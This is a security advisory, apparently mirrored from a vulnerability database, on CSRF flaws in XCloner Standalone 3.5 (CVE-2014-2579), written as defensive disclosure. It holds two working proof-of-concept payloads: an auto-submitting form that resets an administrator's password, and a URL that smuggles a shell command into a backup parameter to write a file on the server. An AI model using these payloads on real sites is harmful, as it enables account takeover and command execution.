Lucene search
K

XCloner Standalone 3.5 Cross Site Request Forgery Vulnerability

🗓️ 10 Apr 2014 00:00:00Reported by High-Tech BridgeType 
zdt
 zdt
🔗 0day.today👁 47 Views

XCloner Standalone 3.5 Cross Site Request Forgery Vulnerability, allows attackers to change passwords and execute arbitrary system command

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-2579
25 Apr 201420:00
cve
Cvelist
CVE-2014-2579
25 Apr 201420:00
cvelist
Exploit DB
XCloner Standalone 3.5 - Cross-Site Request Forgery
10 Apr 201400:00
exploitdb
EUVD
EUVD-2014-2611
7 Oct 202500:30
euvd
exploitpack
XCloner Standalone 3.5 - Cross-Site Request Forgery
10 Apr 201400:00
exploitpack
htbridge
Сross-Site Request Forgery (CSRF) in XCloner Standalone
14 Mar 201400:00
htbridge
NVD
CVE-2014-2579
25 Apr 201420:55
nvd
Packet Storm
XCloner Standalone 3.5 Cross Site Request Forgery
9 Apr 201400:00
packetstorm
Patchstack
WordPress XCloner Standalone Plugin <= 3.5 - Multiple CSRF
21 Mar 201400:00
patchstack
Prion
Cross site request forgery (csrf)
25 Apr 201420:55
prion
Rows per page
Product: XCloner Standalone
Vendor: XCloner
Vulnerable Version(s): 3.5 and probably prior
Tested Version: 3.5
Advisory Publication:  March 14, 2014  [without technical details]
Vendor Notification: March 14, 2014 
Public Disclosure: April 9, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2579
Risk Level: High 
CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Standalone, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the website.


1. Сross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2579

1.1 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator’s password.

The exploitation example below changes password for user 'login' to 'immuniweb':


<form action="http://[host]/index2.php" method="post" name="main">
<input type="hidden" name="jcuser" value="login">
<input type="hidden" name="jcpass" value="password">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="config">
<input type="hidden" name="action" value="save">
<script>
document.main.submit();
</script>
</form>


1.2 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and execute arbitrary system commands on vulnerable system with privileges of the webserver.

The exploitation example below uses the 'echo' system command to write 'immuniweb' string into file '/var/www/file.php':

http://[host]/index2.php?option=com_cloner&task=generate&bname=1&dbbackup=1&cron_access=1&dbbackup_comp=||%20echo immuniweb > /var/www/file.php%20||

Successful exploitation of this vulnerability requires that options 'enable_db_backup' and 'sql_mem'  are enabled in application’s configuration file.

-----------------------------------------------------------------------------------------------

Solution:

Vendor ignored:
- 6 notifications by email
- 4 notifications via contact form
- 1 notification via twitter. 

Currently we are not aware of any official solution for this vulnerability. As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via WAF of .htaccess.

#  0day.today [2018-02-17]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation